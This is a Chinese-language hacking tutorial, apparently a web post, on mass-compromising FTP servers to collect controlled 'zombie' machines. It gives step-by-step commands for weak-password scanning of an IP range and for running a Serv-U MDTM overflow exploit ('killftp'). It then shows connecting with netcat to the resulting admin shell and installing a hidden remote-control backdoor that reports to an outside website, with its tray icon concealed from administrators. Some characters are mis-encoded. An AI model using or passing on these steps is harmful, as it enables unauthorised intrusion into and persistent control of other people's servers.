1、掃描并確定目標(biāo)  

　　俗話說的好，欲速則不達(dá)，要想在最短的時(shí)間內(nèi)百發(fā)百中得到大量肉雞.必須先確定存在FTP服務(wù)的主機(jī)，這通過掃描來完成 

　　FTPSCAN是一款命令行下的FTP弱口令掃描指定的IP網(wǎng)段中快速掃描存在FTP弱口令的主機(jī)，速度和身材都是一級棒.用法也很簡單! 

　　步驟1:進(jìn)入DOS命令行然后轉(zhuǎn)到保存ftpscan的路徑下 輸入掃描命令:ftpscan.exe 218.109.2.1-218.109.2.255 200 IP段可以自己找 

　　即以200的線程數(shù)掃描網(wǎng)段，218.109.2.1-218.109.2.255.看是否存在FTP弱口令 

　　步驟3:不一會工夫即可掃描完，掃描結(jié)果在同目錄的ftpscan.txt下保存，打開查看，可以看到一些開放了FTP弱口令的主機(jī).這些就是我們即將 

　　練槍的靶子 

　　2.確認(rèn)FTP服務(wù)器類型 

　　雖然我們通過剛才的步驟得到了大量存在FTP弱口令的主機(jī)，但并不表明它們都可以被入侵.因?yàn)樗麄兊腇TP服務(wù)器類型還沒確定.可能是微軟的 

　　FTP.或者是WUFTP等等. 

　　而我們?nèi)肭謺r(shí)所利用的漏洞是serv-u FTP的，所以還必須對這些存在FTP弱口令的主機(jī)進(jìn)行一下類型確認(rèn); 

　　步驟1 將剛才掃描生成的ftpscan.txt進(jìn)行過濾.全部留下IP.以每個(gè)IP一行的規(guī)則保存. 

　　步驟2 打開superscan掃描器.勾選"顯示主機(jī)響應(yīng)"，IP設(shè)置里選擇"導(dǎo)入文件"，然后選擇保存好的ftpscan.txt，最后將掃描端口定義在21上.完 

　　成之后就要吧開始掃描了 

　　步驟3:很快掃描完畢.詳細(xì)顯示了被掃描主機(jī)的FTP服務(wù)器類型.可以看出有臺目標(biāo)主機(jī)的FTP服務(wù)器類型為:serv-u FTP 

　　二、入侵指定目標(biāo) 

　　通過剛才的掃描等一系列步驟.我已經(jīng)確定了要下手的目標(biāo). 

　　下面，開始使用serv-u MDTM溢出漏洞進(jìn)行入侵. 

　　步驟1:在命令行下運(yùn)行serv-u MDTM溢出的利用程序killftp.察看到幫助文件 

　　步驟2:按照提示.我們輸入命令:killftp 218.109.2.222 21 ftp ftp. 即對一臺IP為218.109.2.222，帳號為FTP.密碼為FTP的主機(jī)進(jìn)行攻擊， 

　　可以看出，提示成功之后連接8111端口 

　　步驟3:按照成功提示.我們利用NC端口程序連接目標(biāo)主機(jī)的8111端口，輸入連接命令: nc -vv 218.109.2.222 8111 很快就可以得到一個(gè)新的 

　　DOS窗口.而且這個(gè)窗口還是管理員權(quán)限的.就這么簡單 

　　三、后門旋轉(zhuǎn)保留肉雞  


　　通過.剛才的方法進(jìn)入了服務(wù)器內(nèi)部，但是要保住這臺肉雞，還真有點(diǎn)困難. 

　　一是.可能它是動態(tài)I定次重新啟動之后就丟了，或者是對方管理員很警覺.不讓你有絲毫留后門的機(jī)會. 那么該怎么辦呢?我向大家推薦一款非 

　　常好的后門工具來解決難題，web my pc是一款自動上線的遠(yuǎn)程管理軟件.本來是為了管理員遠(yuǎn)程管理主機(jī)之用，它具有自動上線，連接速度快， 

　　可以直接瀏覽器中操作的特點(diǎn).不需要任何外接軟件.剛才的那臺肉雞存在terminal server(遠(yuǎn)程終端服務(wù)).我很容易通過連接就進(jìn)入到其內(nèi)部 

　　下面在圖形界面下將web my pc安裝成為后門.步驟1:在肉雞上打開web my pc的主程序進(jìn)行設(shè)置.先填寫登錄名稱和密碼，這需要注冊，因?yàn)閣eb my pc是一家公司提供的服務(wù)，要想使用它，必須 

　　先注冊. 

　　步驟2:接下來在web my pc的主程序中填寫上登錄名稱，密碼等相關(guān)信息，設(shè)置完畢.即可開始運(yùn)行.在運(yùn)行時(shí)屏幕右下角的任務(wù)欄會顯示其圖標(biāo). 步驟3:在右下角任務(wù)欄顯示的圖標(biāo)上點(diǎn)鼠標(biāo)右鍵，選擇"安裝為windows服務(wù)"，這樣就可以將web my pc安裝為系統(tǒng)服務(wù). 

　　可以找到服務(wù):webmypc server.將其啟動類型設(shè)置為"自動"并啟動服務(wù)即可. 

　　這樣徹底將服務(wù)安裝完畢.以后每次就會隨機(jī)啟動. 

　　步驟4:在右下角任務(wù)欄顯示的圖標(biāo)非常的礙眼.很容易讓管理員發(fā)現(xiàn)，所以必須將它去掉，方法是:點(diǎn)"開始"，"運(yùn)行"，輸入regedit.打開注冊表， 

　　進(jìn)入路徑為 HKEY_LOCAL_MACHINE\software\mirosoft\windows\currentversion\run 將webmypc的啟動鍵值.webmypc刪除掉即可.這樣就不 

　　會在右下角任務(wù)欄顯示出圖標(biāo)了 

　　步驟5:一切設(shè)置完畢之后，就可以登錄網(wǎng)站:http://dns0755.net填寫申請的用戶名和密碼進(jìn)入，然后點(diǎn)"自助服務(wù)"項(xiàng)目，可以在那里找 

　　到上線的肉雞.名字叫:黑蛋.這樣就可以遠(yuǎn)程控制它了. 

　　這樣利用這個(gè)漏洞以及介紹的后門webmypc，完全可以搞大量的肉雞，而且不會擔(dān)心肉雞丟失，實(shí)在是機(jī)不可失 

最新評論